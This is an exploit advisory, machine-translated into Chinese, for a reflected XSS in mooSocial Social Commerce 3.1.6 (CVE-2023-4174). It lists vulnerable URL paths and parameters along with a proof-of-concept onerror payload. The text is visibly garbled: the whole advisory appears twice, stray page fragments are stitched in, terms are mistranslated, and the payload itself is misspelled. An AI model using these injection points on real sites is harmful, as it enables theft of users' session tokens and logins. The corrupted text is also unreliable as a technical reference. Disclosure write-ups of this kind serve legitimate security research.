#利用标题:社会商业3.1.6-反映XSS
#利用作者:饼干
#日期: 28/07/2023
#vendor:穆斯社会
#供应商homepage: https://moosocial.com/
#软件link: https://social-commerce.moosocial.com/
#版本: 3.1.6
#测试在: Windows 10 Pro
#Impact:操纵网站的内容
#CVE: CVE-2023-4174
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
攻击者可以将电子邮件或即时消息中包含恶意URL的链接发送给受害者
可以执行各种各样的动作,例如窃取受害者的会议令牌或登录凭据
PATH: /搜索/索引
获取参数“ Q”很容易受到XSS的影响
URL路径文件夹[1,2]很容易受到XSS的影响
https://website/store [xss]/all-products?store_id=keyword=price_from=price_to=rating=store_category_id=sartby=saltby=most_recent
https://website/user_info [XSS]/index/friends
https://website/user_info/index [XSS]/朋友
https://website/FAQS [XSS]/index?content_search=
https://website/faqs/index [xss]?content_search=
XSS有效载荷:
j8chn'img src=a onerror=arter(1)ridxm
[-] 完毕
#利用作者:饼干
#日期: 28/07/2023
#vendor:穆斯社会
#供应商homepage: https://moosocial.com/
#软件link: https://social-commerce.moosocial.com/
#版本: 3.1.6
#测试在: Windows 10 Pro
#Impact:操纵网站的内容
#CVE: CVE-2023-4174
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
攻击者可以将电子邮件或即时消息中包含恶意URL的链接发送给受害者
可以执行各种各样的动作,例如窃取受害者的会议令牌或登录凭据
PATH: /搜索/索引
获取参数“ Q”很容易受到XSS的影响
正在加载...
website
https://website/store [xss]/all-products?store_id=keyword=price_from=price_to=rating=store_category_id=sartby=saltby=most_recent
https://website/user_info [XSS]/index/friends
https://website/user_info/index [XSS]/朋友
https://website/FAQS [XSS]/index?content_search=
https://website/faqs/index [xss]?content_search=
XSS有效载荷:
j8chn'img src=a onerror=arter(1)ridxm
[-] 完毕